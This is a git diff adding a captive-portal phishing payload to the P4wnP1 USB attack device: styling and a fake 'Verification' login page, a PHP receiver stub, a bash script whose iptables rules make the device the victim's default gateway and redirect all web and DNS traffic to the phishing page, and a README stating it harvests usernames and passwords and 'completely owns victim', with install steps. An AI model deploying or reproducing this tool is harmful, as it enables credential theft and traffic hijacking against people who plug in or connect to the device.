diff --git a/payloads/Captive_Portal/Apache/css/style.css b/payloads/Captive_Portal/Apache/css/style.css new file mode 100644 index 0000000..ca07648 --- /dev/null +++ b/payloads/Captive_Portal/Apache/css/style.css @@ -0,0 +1,105 @@ +@import url(https://fonts.googleapis.com/css?family=Roboto:400,100); + +body { + background: url(https://dl.dropboxusercontent.com/u/23299152/Wallpapers/wallpaper-22705.jpg) no-repeat center center fixed; + -webkit-background-size: cover; + -moz-background-size: cover; + -o-background-size: cover; + background-size: cover; + font-family: 'Roboto', sans-serif; +} + +.login-card { + padding: 40px; + width: 274px; + background-color: #F7F7F7; + margin: 0 auto 10px; + border-radius: 2px; + box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3); + overflow: hidden; +} + +.login-card h1 { + font-weight: 100; + text-align: center; + font-size: 2.3em; +} + +.login-card input[type=submit] { + width: 100%; + display: block; + margin-bottom: 10px; + position: relative; +} + +.login-card input[type=text], input[type=password] { + height: 44px; + font-size: 16px; + width: 100%; + margin-bottom: 10px; + -webkit-appearance: none; + background: #fff; + border: 1px solid #d9d9d9; + border-top: 1px solid #c0c0c0; + /* border-radius: 2px; */ + padding: 0 8px; + box-sizing: border-box; + -moz-box-sizing: border-box; +} + +.login-card input[type=text]:hover, input[type=password]:hover { + border: 1px solid #b9b9b9; + border-top: 1px solid #a0a0a0; + -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); + -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); + box-shadow: inset 0 1px 2px rgba(0,0,0,0.1); +} + +.login { + text-align: center; + font-size: 14px; + font-family: 'Arial', sans-serif; + font-weight: 700; + height: 36px; + padding: 0 8px; +/* border-radius: 3px; */ +/* -webkit-user-select: none; + user-select: none; */ +} + +.login-submit { + /* border: 1px solid #3079ed; */ + border: 0px; + color: #fff; + text-shadow: 0 1px rgba(0,0,0,0.1); + background-color: #4d90fe; + /* background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#4d90fe), to(#4787ed)); */ +} + +.login-submit:hover { + /* border: 1px solid #2f5bb7; */ + border: 0px; + text-shadow: 0 1px rgba(0,0,0,0.3); + background-color: #357ae8; + /* background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#4d90fe), to(#357ae8)); */ +} + +.login-card a { + text-decoration: none; + color: #666; + font-weight: 400; + text-align: center; + display: inline-block; + opacity: 0.6; + transition: opacity ease 0.5s; +} + +.login-card a:hover { + opacity: 1; +} + +.login-help { + width: 100%; + text-align: center; + font-size: 12px; +} \ No newline at end of file diff --git a/payloads/Captive_Portal/Apache/index.html b/payloads/Captive_Portal/Apache/index.html new file mode 100644 index 0000000..ab88ecf --- /dev/null +++ b/payloads/Captive_Portal/Apache/index.html @@ -0,0 +1,28 @@ + + + + + Verification + + + + + + + + + + +
+

Verification


+ +
+ Username + Password + +
+
+ + + + diff --git a/payloads/Captive_Portal/Apache/license.txt b/payloads/Captive_Portal/Apache/license.txt new file mode 100644 index 0000000..d07ef55 --- /dev/null +++ b/payloads/Captive_Portal/Apache/license.txt @@ -0,0 +1,12 @@ + + + diff --git a/payloads/Captive_Portal/Apache/recieve.php b/payloads/Captive_Portal/Apache/recieve.php new file mode 100644 index 0000000..0153cc1 --- /dev/null +++ b/payloads/Captive_Portal/Apache/recieve.php @@ -0,0 +1 @@ +no post data to process \ No newline at end of file diff --git a/payloads/Captive_Portal/Captiveportal.txt b/payloads/Captive_Portal/Captiveportal.txt new file mode 100644 index 0000000..b4212ae --- /dev/null +++ b/payloads/Captive_Portal/Captiveportal.txt @@ -0,0 +1,51 @@ +# This file is part of P4wnP1. +# +# Copyright (c) 2017, Marcus Mengs. +# +# P4wnP1 is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# P4wnP1 is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with P4wnP1. If not, see . + + +#Author: Briskat +#Based on Bash bunny payload by Sebastian Kinne 'Sebkinne' + +#================================= +USE_ECM=true # Linux / MacOS ethernet support +USE_RNDIS=true # Enables USB Ethernet Gadget +USE_HID=true # If you ever want to use ducky scripts with this payload +ROUTE_SPOOF=true # Makes IP of P4wnP1 the default gateway on the victim +#================================== + +function setupNetworking() { + echo 1 > /proc/sys/net/ipv4/ip_forward + iptables -I INPUT -i usb1 -p udp --dport 443 -j DROP + iptables -I FORWARD -i usb1 -p udp --dport 53 -j ACCEPT + iptables -I FORWARD -i usb1 -p udp --sport 53 -j ACCEPT + iptables -I INPUT -i usb0 -p udp --dport 443 -j DROP + iptables -I FORWARD -i usb0 -p udp --dport 53 -j ACCEPT + iptables -I FORWARD -i usb0 -p udp --sport 53 -j ACCEPT + iptables -t nat -A PREROUTING -i usb1 -p tcp --dport 443 -j DNAT --to-destination $IF_IP:80 + iptables -t nat -A PREROUTING -i usb1 -p tcp --dport 80 -j DNAT --to-destination $IF_IP:80 + iptables -t nat -A PREROUTING -i usb1 -p udp --dport 53 -j DNAT --to-destination $IF_IP:53 + iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 443 -j DNAT --to-destination $IF_IP:80 + iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j DNAT --to-destination $IF_IP:80 + iptables -t nat -A PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to-destination $IF_IP:53 + iptables -t nat -A POSTROUTING -j MASQUERADE +} + +service apache2 start # Starts apache (must be installed, check out readme for more info)Turn on webserver +setupNetworking # Calls function written above to redirect all network traffic (needs more work) +led_blink 3 # blinks led on pi 3 times in a loop + + + diff --git a/payloads/Captive_Portal/README.md b/payloads/Captive_Portal/README.md new file mode 100644 index 0000000..35bccae --- /dev/null +++ b/payloads/Captive_Portal/README.md @@ -0,0 +1,38 @@ +This is a phishing payload for P4wnP1. + +Author : Brisk4t (https://github.com/Brisk4t) + +Credits : + +Sebastian Kinne - Sebkinne :(https://github.com/sebkinne) + +Stackoverflow's Floby : https://stackoverflow.com/users/1946228/floby + +Ayu : https://codepen.io/Mongeed/pen/IuBLt + +P4wnP1 is made by Mame82 : https://github.com/mame82 + +###################################################### + +What does it do : + +1. Set's up an apache server with an html form page with username and data fields +2. Redirects all traffic on victim to this page (so google.com goes to your phishing page) +3. Saves collected data to text file using php +4. Comepletely owns victim. + +###################################################### + +Setup + +1. Have P4wnP1 (i know, could never guess). Instructions here : https://github.com/mame82/P4wnP1 +2. Install apache2 and PHP. Paste the following into terminal : sudo apt-get install apache2 php7.0 libapache2-mod-php7.0 -y +3. Copy contents of 'Apache' folder of this repo into /var/www/html (replce the original index.html) +4. Copy the Captive_Portal folder to P4wnP1/payloads +5. Add following line to setup.cfg : PAYLOAD=Captive_Portal/Captiveportal.txt +6. Comment out all other payloads in setup.cfg +7. Reboot P4wnP1 + +If this is too much reading for you, video coming soon. + +######################################################